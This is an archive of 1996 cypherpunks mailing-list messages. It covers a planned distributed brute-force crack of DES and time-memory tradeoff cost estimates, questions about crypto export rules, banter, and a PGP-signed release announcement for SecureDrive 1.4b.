We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Wed, 24 Jul 1996 21:01:29 +0800
To: "'Ray Arachelian'" <sunder@dorsai.dorsai.org>
Subject: RE: Brute Force DES
Message-ID: <c=US%a=_%p=msft%l=RED-77-MSG-960723231822Z-3820@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


well, first of all, I wasn't computing 2^40, I was computing something
like 2^(56*0.667) * 8bytes/each or somesuch, I don't recall exactly as I
don't have the paper in front of me. In any case, it was the tradeoff
between time and space -- 2^40 in time was something like 2^38th in
space. But don't trust my numbers, get the paper and rattle them off
yourself. 

It just seems like if we're going to browse all of the way through the
DES keyspace, we _ought_ to take notes along the way -- that means
building a table. I don't care how big the table is; if it is only 2^30
entries (about 1G entries, each 8 bytes = 8Gig) we reduce our next DES
crack by a factor of 8. If we keep 2^31 entries (16Gig) we can cut it
down to 2^50, or a factor of 16. If we have 4 - 9 Gig drives (or perhaps
three drives and some wiggling, described below) we can save about 2^32
entries and the search becomes a measly 2^48. :)

To whittle this down to a 40-bit workload, we'd have to save 2^36
entries* 2^8 bytes/entry = 2^39 Bytes = 512 Gig. Yes, admittedly large.
What's the cheapest form of storage, magtape? How much can you store on
magtape? The entries can be sorted so that lookup doesn't take long even
when you have to mount tapes. 

Wiggling: 
We may be able to save less than 2^8 bytes/entry because we know the
quality that made the point interesting enough to save (say we only keep
points where the top 32 bits were zeros -- no need to save these zero
prefixes) but I suppose we'd only be able to cut this storage factor
down by a factor of two at most.


If you don't have Hellman's paper handy, the apropos formulas are:
Total time=T, memory=M, search space=N

Time/space tradeoff:
M=mt , T=t^2, m*t^2=N

In our case, N=2^56; M, T variable. 

mattt
>----------
>From: 	Ray Arachelian[SMTP:sunder@dorsai.dorsai.org]
>Sent: 	Tuesday, July 23, 1996 3:16 PM
>To: 	Matt Thomlinson
>Cc: 	'trei@process.com'; 'cypherpunks@toad.com'
>Subject: 	RE: Brute Force DES
>
>On Tue, 23 Jul 1996, Matt Thomlinson wrote:
>
>> why not put together (a LOT of) disk space and we can build a table
>> (read: "a cryptanalytic time-memory tradeoff") for cracking DES? Using
>> the table, we could brute-search the DES keyspace in less time than it
>> would take to do an exhaustive search of a 38 bit keyspace, according to
>> the paper. 4 gigs is what, a couple of hundred nowadays?
>> 
>> Making DES equivalent to a 40-bit crack would take approx. 500Gig, but
>> publishing the table would push DES out usefulness. Certainly we could
>> scale back (make DES equivalent to a 45-bit crack?) if we don't have
>> enough disk...
>
>IMHO it's more expensive to go this route than to build a machine with
>dedicate DES cracking chips. 2^40 = 1,099,511,627,776 or about 1 terabyte
>worth of space, not 500G. 2^39 would be 500Gb. A 4Gb drive these days is 
>$800, hardly a couple of hundred dollars. :)
>
>Even so, that's a ton of hard drives. Further you need machines to hook 
>these drives up to. Infact, you need a farm of machines.  Why?  You can 
>only put 7 on a chain, and maybe if you're lucky four chains in a machine 
>using four controllers.
>
>A better idea might be to make small cheap computers, say based on 8086's 
>or 68000's that replace the drive's controller card, or if that drive 
>controller card is intelligent enough to be a CPU or contain one, burn 
>EEPROMs.  Have the EEPROMs be able to generate DES (or any other 
>cypher's) keyspace given a range, and then have them able to search the 
>whole drive for a match.
>
>Even so, if you build these drive boxes, all you've accomplished is to 
>create a nice huge big searchable array.  You still will need some sort 
>of logic to figgure out when it finds the right key, and you still can't 
>do 3DES or recusively encrypted files, nor know when you've found the key 
>for data you can't recognize - or rather have these drives recognize.
>
>However: Reading a 4Gb drive end to end takes less than 2 hours.  I know 
>this because I have a RAID array of them, and it takes 2 hours to 
>rebuild, so since rebuilding an array requires reading from two drives 
>and writing to one drive, reading a whole 4Gb drive at full speed would 
>be something like maybe 1 to 1.5 hours(???)
>
>You might be better off with 9.0Gb drives if you can afford them because 
>you then have less controller logic cards to build.
>
>The drives alone will cost $204,800.  $800*(2^40/(4*1024*1024*1024)).  
>You could get a nice big discount if you buy that many, but this will 
>also mean however much it will cost you to build the cpu cards for 
>multiplied by 256 drives, plust the R&D cost, plus the network connection 
>between all the CPU boards.
>
>At that point you also run into the MTBF of the drives which means that 
>your drives will fail quite often.
>
>If you want to go dirt cheap on the CPU's while using this huge space
>method, you could just buy something like 37 Mac IIsi's, hook each up to 7
>of the drives (you'll have to partition the drives as they won't support
>volumes that huge.) and network the machines using localtalk.  You won't
>need a faster connection because all you need for networking is keyspace 
>distribution and success reporting.  But then IIsi's are sloooow machines 
>and your searches will suffer a hit from the lack of the machine's speed, 
>plus all the overhead of having an operating system and using the SCSI 
>chain to talk to the drives.
>
>IIsi's go for $350-$500 nicely loaded... $14800 for 37 at $400 a pop, 
>add the drives to that, plus the cost of writing the program and hooking 
>all of this crap together and that'll be  $219,600.  Ya got that kinda 
>dough to spare?
>
>==========================================================================
> + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
>  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
><--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
>  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
> + v + | Janet Reno & GAK|AK|        do you not understand?       |=======   
>===================http://www.dorsai.org/~sunder/=========================
> Key Escrow Laws are the mating calls of those who'd abuse your privacy!
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill Olson (EDP)" <a-billol@microsoft.com>
Date: Wed, 24 Jul 1996 22:22:21 +0800
To: "'cypherpunks@toad.com>
Subject: RE: No more stupid gun thread ...
Message-ID: <c=US%a=_%p=msft%l=RED-16-MSG-960723232151Z-37234@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz writes:
>
>How _can_ anyone say that "stupid guns" is ready for the trash-heap of 
>history?   No one has called anyone a Nazi yet!

I agree.
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Wed, 24 Jul 1996 22:54:05 +0800
To: tcmay@got.net
Subject: Re: Brute-forcing DES
Message-ID: <Pine.BSF.3.91.960723151253.191A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Specialized DES-cracker chips have of course been considered. Diffie and
> Hellman's nearly 20-year-old paper on cracking DES considered this.
> Wiener's calculation of a few years ago did more that this: he also
> architected a basic system. And the "how many bits is enough?" (sorry I
> don't have the official name on the tip of my tongue) panel considered such
> designs last year.

Yep, I'm familiar with the issue.

Bottom line is, it'll take thousands of times the CPU power of the RC4-40
crack. Probably not 2^16 times more; I think RC4 has a longer
initialization. 

> But actually building a DES cracker entails a level of commitment very
> difficult to achieve in an informal, volunteer effort. Not exactly
> something that 10 or 20 people can work on usefully.
> The advantage of the cracks done last year, the French and Australian
> cracks, and the MIT cracks, were that the "entry costs" for joining the
> project were low.

I'm not talking about one individual or organization building one big DES
cracker. I'm thinking that DES chips _could_ be used to supliment the PCs
in a distributed crack. People with PCs would feed keyspace through their
PCs and people with DES chips could feed keyspace through their DES chips.
DES chips just happen to have a _lot_ more cracking power than PCs, so
they could make a big difference. Adding one DES chip would be like adding
hundreds of PCs to the effort. PCs will probably still be the main factor
simply because they're ubiquitous. 

Even with a bunch of DES chips and a massive legion of PCs, this is going
to take a long time. Perhaps we should be looking at the thousands of
computers and many months, more like the RSA-129 crack than the RC4-40
crack. 

>From "The Magic Words Are Squeamish Ossifrage":
> We believe that we could acquire 100 thousand machines without 
> superhuman or unethical efforts.

If Lenstra et al know what they're talking about, then WE CAN DO THIS!!!


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Wed, 24 Jul 1996 13:14:53 +0800
To: cypherpunks@toad.com
Subject: Question
Message-ID: <TCPSMTP.16.7.23.-16.25.32.2645935021.655231@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


OK...A question for you all:

  If it is illegal (by our governments standards...) to export programs
like PGP, etc., and you can send the whole source code in a message 
because that is also considered illegal, then could you send the code,
broken up into many pieces, and send THAT in Email, would that be 
illegal?

  (Wow...All in one sentence... :)


P.J.
pjn@nworks.com


... I am Jesus of Borg.  Blessed are they who are assimilated.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Wed, 24 Jul 1996 13:09:26 +0800
To: cypherpunks@toad.com
Subject: Brute-forcing DES
Message-ID: <TCPSMTP.16.7.23.-16.25.44.2645935021.655233@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 > Any one up for a distributed brute force attack on single DES? My 
 > back-of-the-envelope calculations and guesstimates put this on the
 > hairy edge of doability (the critical factor is how many machines can
 > be recruited - a non-trivial cash prize would help). 

 >> Count me in. I've got a couple of net-connected Pentiums that are
 >> mostly idle. 

    Although I dont have a pentium, I would be glad to put forth
    some computer power to help.

 >> Might be able to bring some money in by selling "I Helped Crack DES
 >> And  All I Got Was This Lousy T-shirt" T-shirts.

    Id buy one! :)


 P.J.
 pjn@nworks.com




... I helped crack DES and all I got was this lousy Tagline.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Wed, 24 Jul 1996 01:32:13 +0800
To: cypherpunks@toad.com
Subject: Re: Distributed DES crack
In-Reply-To: <199607230422.AAA09435@crypto.com>
Message-ID: <Pine.GSO.3.93.960723162113.9199D-100000@nebula.online.ee>
MIME-Version: 1.0
Content-Type: text/plain



A little bit off topic, but some years ago some guys at our university
were working on a project called "Cryptographic module for digital
communications". I don't know if they ever finished it though, but it
might be of some use to someone out there.

The project aim was:

Create integrated circuit (further CryptoChip or CC) capable of key
exchange and generation using modular exponent based cryptosystem and
block encryption using IDEA cipher. The ideology behind CC is based on
having the minimal amount of information inside the chip and guaranteed
block cipher encryption rate above 10 Mbit/sec. 

They have an old web page at: http://www.pld.ttu.ee/cchip/cchip.html

Jüri Kaljundi
jk@stallion.ee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Wed, 24 Jul 1996 03:01:21 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: [Noise] Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <2.2.32.19960723060437.00d2b8b0@mail.teleport.com>
Message-ID: <9607231629.aa13855@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <2.2.32.19960723060437.00d2b8b0@mail.teleport.com>, Alan Olsen write
s:
>At 10:16 PM 7/22/96 -0500, snow wrote:
>>     Yeah, and to a fscking statist you give your all to the state. 
>                     ^^^^^^^
>This is assuming that the state is corrupted and needs to be remounted.  (Or
>is not considered clean opon boot.)  Which might not be a bad assumption...
>Assuming that it can fix the errors it finds in the state in the first place.

	ROTFL!!!!

>Sorry.  Too much time spent fixing corrupted disks today.  (I hate cheap
>hardware.)

	A little light relief is welcome.

	Derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Wed, 24 Jul 1996 18:01:26 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Through Radio [joke reply]
In-Reply-To: <01BB752B.81D53DE0@ip65.i-manila.com.ph>
Message-ID: <96Jul23.172200edt.20481@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> In article <01BB752B.81D53DE0@ip65.i-manila.com.ph>, Jerome Tan <jti@i-manila.com.ph> writes:

    > Does anyone know how to Internet through radio using packet modems? By =
    > next year, our telephone company will be implementing metered phones, =
    > this will be unfair to modem users since they do that to prevent people =
    > from talking to the phone for long hours.

<Joke mode on>

Sorry, but I couldn't resist: 

You talk to your phone???
I've always found non-sentient peices of metal and plastic (and
assorted semiconductors) to be awfully boring conversation partners,
but maybe it's just me...

-Robin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@garg.campbell.ca.us (Edgar Swank)
Date: Wed, 24 Jul 1996 06:38:31 +0800
To: Cypherpunks          <cypherpunks@toad.com>
Subject: Announcing SecureDrive 1.4b
Message-ID: <31f4f574.1842657@news.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This is to announce the availability of Version 1.4b of SecureDrive.

SecureDrive Version 1.4b replaces version 1.4a, 1.4, 1.3d, and previous
versions.

Release 1.4b is a maintenance release of 1.4/a. No new function is added.

Only modules SDCOMMON.C, SETENV.ASM and CRYPTDSK.C have non-cosmetic
changes, which affect executables LOGIN.EXE and CRYPTDSK.EXE.  For
that reason, all other executables still self-identify as release 1.4.
They are in fact the exact same EXE & COM files as release 1.4.

1.4b fixes problems setting PGPPASS from Windows 95, either inside
Win95 from a DOS window, or from the DOS 7.0 environment outside
Windows.

Unfortunately, LOGIN still cannot activate SecureDrive decryption from
inside a Win95 DOS window.

This same fix also, for the first time, enables LOGIN to set
PGPPASS (as well as activate SecureDrive) from inside a
Windows 3.x DOS window.

CRYPTDSK also contains added warning msgs for 1) attempting to encrypt
drive C: and 2) interrupting en/decryption with Ctrl-Break.

There are also some minor changes in SECDRV.DOC.

In the USA, SecureDrive 1.4b is now available at

    Colorado Catacombs BBS - 303-772-1062 (up to 28,800 bps, 8n1) -
    log in with your own name or alias.  Download SECDR14B.ZIP from
    the [F]ile menu.

    ftp://ftp.csn.net/mpj/USA/?????/disk/secdr14b.zip
    where the ????? is given in ftp://ftp.csn.net/mpj/README

These are all controlled-access sites available to USA citizens and
residents only.

Thanks to the cooperation of Steve Crompton of the U.K., who worked
with me closely, I am able to also announce availability on an
offshore site,

  ftp://utopia.hacktic.nl/pub/replay/pub/disk/secdr14b.zip

In case anyone in the U.S. Justice Dept. is reading this, Steve and I
were very careful to do this release without violating US export
restrictions. The only things I "exported" to Steve were "diffs" for
source changes from 1.4a to 1.4b, which themselves don't contain any
code capable of encryption or decryption. Steve combined those with
source for 1.4a, already available overseas.

Steve compiled the new source code, and sent the new EXE files to me.
I compared the new executables to ones I compiled myself and verified
they match, bit for bit.  I then sent back to Steve detached signature
files for the executables.  Steve then put together secdr14b.zip and
sent that to me for final inspection.  I then compared all files
against my "master" files here and verified that they matched. I then
shipped the secdr14b.zip that Steve sent me to the USA sites. So the
USA release matches bit for bit the offshore release.

Here are the contents of secdr14b.zip

 Length  Method   Size  Ratio   Date    Time    CRC-32  Attr  Name
 ------  ------   ----- -----   ----    ----   -------- ----  ----
  54081  DeflatX  19452  65%  07-20-96  19:45  8f807f09 --w-  SECDRV.DOC
  43718  DeflatX  20532  54%  07-20-96  20:12  21b5a5cb --w-  LOGIN.EXE
  42564  DeflatX  20333  53%  07-20-96  20:12  bdda692b --w-  CRYPTDSK.EXE
  32595  DeflatX   8786  74%  08-06-95  00:00  1c7d2225 --w-  SECTSR.ASM
  20623  DeflatX   4896  77%  07-20-96  19:34  f4c9ffda --w-  CRYPTDSK.C
  19664  DeflatX   4184  79%  11-19-93  21:42  22c2502c --w-  CRYPT2.ASM
  18598  DeflatX   4560  76%  07-20-96  19:41  7b2def07 --w-  LOGIN.C
  18321  DeflatX   6917  63%  06-14-93  22:27  0767480b --w-  COPYING
  15466  DeflatX   9750  37%  07-20-96  20:12  a90b90ff --w-  FPART.EXE
  14998  DeflatX   4111  73%  06-12-96  18:06  858fc2cb --w-  SDCOMMON.C
  13011  DeflatX   3073  77%  07-20-96  19:48  4fbda9fb --w-  SETENV.ASM
  12606  DeflatX   7634  40%  07-20-96  20:12  5b3023ad --w-  COPYSECT.EXE
  11557  DeflatX   3274  72%  05-09-93  19:38  e71f3eea --w-  MD5.C
   5278  DeflatX   3467  35%  11-14-95  20:52  af2f141c --w-  KEY.ASC
   4353  DeflatX   1721  61%  08-06-95  00:00  b4e99e6a --w-  FPART.C
   3656  DeflatX   1101  70%  08-06-95  00:00  6ed75bcc --w-  SECDRV.H
   3407  DeflatX   1105  68%  05-11-93  12:49  f1f58517 --w-  MD5.H
   2022  DeflatX    789  61%  08-06-95  00:00  dd3e9e64 --w-  COPYSECT.C
   2000  DeflatX   1324  34%  07-20-96  20:12  ba1568d1 --w-  SECTSR.COM
   1554  DeflatX    569  64%  08-06-95  00:00  3589f489 --w-  MAKEFILE
   1355  DeflatX    629  54%  01-21-94  08:44  db63ade4 --w-  RLDBIOS.ASM
   1254  DeflatX    543  57%  05-09-93  19:39  182978aa --w-  USUALS.H
    278  DeflatX    213  24%  12-06-95  20:33  6c13428c --w-  FILE_ID.DIZ
    152  Stored     152   0%  08-06-95  00:00  17b02bc2 --w-  COPYSECT.SIG
    152  Stored     152   0%  06-01-96  01:10  c195c865 --w-  CRYPTDSK.SIG
    152  Stored     152   0%  08-06-95  00:00  0b345a16 --w-  FPART.SIG
    152  Stored     152   0%  06-01-96  01:09  4cebe45a --w-  LOGIN.SIG
    152  Stored     152   0%  08-06-95  00:00  3817512c --w-  SECTSR.SIG
 ------          ------  ---                                  -------
 343719          129723  63%                                       28

Also note that the ZIP file contains PGP detached signatures (*.SIG)
for the executable files.  Finally here is my public key, also
available on many public keyservers and on my home page (below); note
who has signed it.  Also please note my present Email addresses.

Edgar W. Swank   <edgar@Garg.Campbell.CA.US>
Edgar W. Swank   <Edgar_W._Swank@ilanet.org>
Home Page: http://members.tripod.com/~EdgarS/index.html

(Note: only Garg and ilanet addresses are currently valid. Garg is preferred.)
Type bits/keyID    Date        User ID
pub  1024/DA87C0C7 1992/10/17  Edgar Swank   <edgar@Garg.Campbell.CA.US>
sig       E8E044BD               Peter Herngaard <pethern@datashopper.dk>
sig       DA87C0C7               Edgar Swank   <edgar@Garg.Campbell.CA.US>
sig       4AAF00E5               Dave Del Torto <ddt@lsd.com>
sig       32DD98D9               Vesselin V. Bontchev <bontchev@complex.is>
sig       0F59323D               Albert Yee <sa3189049@ntuvax.ntu.ac.sg>
                               Edgar W. Swank   <Edgar_W._Swank@ilanet.org>
sig       DA87C0C7               Edgar Swank   <edgar@Garg.Campbell.CA.US>
                               Edgar W. Swank <edgar@spectrx.sbay.org>
sig       91E71221               Cruz <cruz@ccxbbs.uunet.ve>
sig       DA87C0C7               Edgar Swank   <edgar@Garg.Campbell.CA.US>
sig       C0595F91               Ian H. Chan <ianchan@iti.gov.sg>
sig       61130A1B               Arnold L. Cornez, J.D. <arniec@dnai.com>
sig       18239E91               Robert C.Casas <73763.20@compuserve.com>
sig       4AAF00E5               Dave Del Torto <ddt@lsd.com>
sig       08B707C5               Anton Sherwood <dasher@netcom.com>
sig       32DD98D9               Vesselin V. Bontchev <bontchev@complex.is>
sig       34D74DC1               Peter Simons <simons@petium.rhein.de>
                               Edgar W. Swank <edgar@spectrx.saigon.com>
sig       877AA661               Peter Simons *OLD KEY* <simons@peti.GUN.de>
sig       4AAF00E5               Dave Del Torto <ddt@lsd.com>
sig       3245BF5D               Jeremy S. Anderson
                                    <jeremy@cctwin.ee.ntu.edu.tw>
sig       08B707C5               Anton Sherwood <dasher@netcom.com>
sig       32DD98D9               Vesselin V. Bontchev <bontchev@complex.is>
sig       FF67F70B               Philip R. Zimmermann <prz@sage.cgd.ucar.edu>
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

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
=N7az
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfT1Bt4nNf3ah8DHAQEFdwP/QYiBhqlP0K5YMqY6LIb4EQWy/ddZd4ji
R5dwYRBxfErnb7h+3K4mtH/gFf/rznSDt5TONLIfaw2nGXx0nSpa9ANFbRhYaZTX
GSaesh1wDQ0Z3/OZaKYpaKXbiZuprbBm0OEzTqb4IoTP4VpyYRrRly01lAtOClT/
IUX3I+irPoY=
=24Ih
-----END PGP SIGNATURE-----

Edgar W. Swank   <edgar@Garg.Campbell.CA.US>
Edgar W. Swank   <Edgar_W._Swank@ilanet.org>
Home Page: http://members.tripod.com/~EdgarS/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
